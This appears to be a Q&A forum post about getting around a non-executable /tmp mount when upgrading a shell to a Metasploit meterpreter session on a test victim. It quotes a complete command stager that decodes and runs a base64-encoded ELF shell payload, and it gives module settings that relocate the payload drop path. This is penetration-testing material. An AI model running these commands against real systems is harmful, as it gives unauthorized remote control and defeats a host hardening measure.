How to set where the meterpreter payload is placed on the victim machine in metasploit?

Background

I am trying to achieve a meterpreter session on a test machine (the "victim") that I already have a shell session on. When I run the command sessions -u #, where # corresponds to the number of the shell session, I receive an error because metasploit tries to create and execute a payload on the victim in the /tmp directory, which is set to be non-executable. In other words, nothing can be executed from the /tmp directory on the victim machine.

Question

Is there a way for me to specify where this executable file is created and executed on the victim machine?

• My goal is to achieve something like this:
  • Use the linux/x86/meterpreter/bind_tcp payload.
  • Instead of having the executable payload be placed in /tmp and called something random such as abc123, I would want to have the payload placed in a known location that allows execution such as /home/Bob.
  • The executable payload whose location we specified, /home/Bob/abc123, will then execute and start the meterpreter session.

Notes

• I believe to do this it has something to do with modifying the "command stager". In the following link you can see this line:

[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]

• Note the execution of the /tmp/tDGmH file toward the end of the command… This is the part of the command that is failing for me due to the /tmp directory being set to non-executable.

  • Link: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/webmin_backdoor.md

• Could possibly involve making changes to this file: https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/bourne.rb

use post/multi/manage/shell_to_meterpreter
set SESSION 2
set BOURNE_PATH /home/Bob
set PAYLOAD_OVERRIDE linux/x86/meterpreter/bind_tcp
run